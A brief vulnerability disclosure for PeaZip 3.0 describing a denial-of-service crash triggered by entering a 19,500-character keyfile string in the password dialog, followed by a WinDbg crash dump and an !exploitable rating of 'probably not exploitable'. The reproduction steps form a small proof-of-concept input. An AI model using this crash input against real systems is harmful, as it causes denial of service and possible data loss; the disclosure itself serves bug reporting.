Peazip 3.0 suffers from a division by zero attack resulting in denial of service vulnerability and possibly loss of data.

To trigger the vulnerability open up the application, click tools, enter password / keyfile.

password: test

confirm password: test

keyfile:"A" * 19500

----------------------------------------------------------------------------------------------------

(d80.8c): Integer divide-by-zero - code c0000094 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000032 ebx=00000032 ecx=00000000 edx=00000000 esi=0173f754 edi=01dd7dd8
eip=00524ea2 esp=0173f438 ebp=0173f440 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for image00400000
image00400000+0x124ea2:
00524ea2 f7f9 idiv eax,ecx
0:000> !exploitable
No export exploitable found
0:000> !load winext/msec.dll
0:000> !exploitable
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\system32\USER32.dll -
Exploitability Classification: PROBABLY_NOT_EXPLOITABLE
Recommended Bug Title: Integer Divide By Zero starting at image00400000+0x0000000000124ea2 (Hash=0x00020e6f.0x637a584a)

This is a divide by zero, and is probably not exploitable.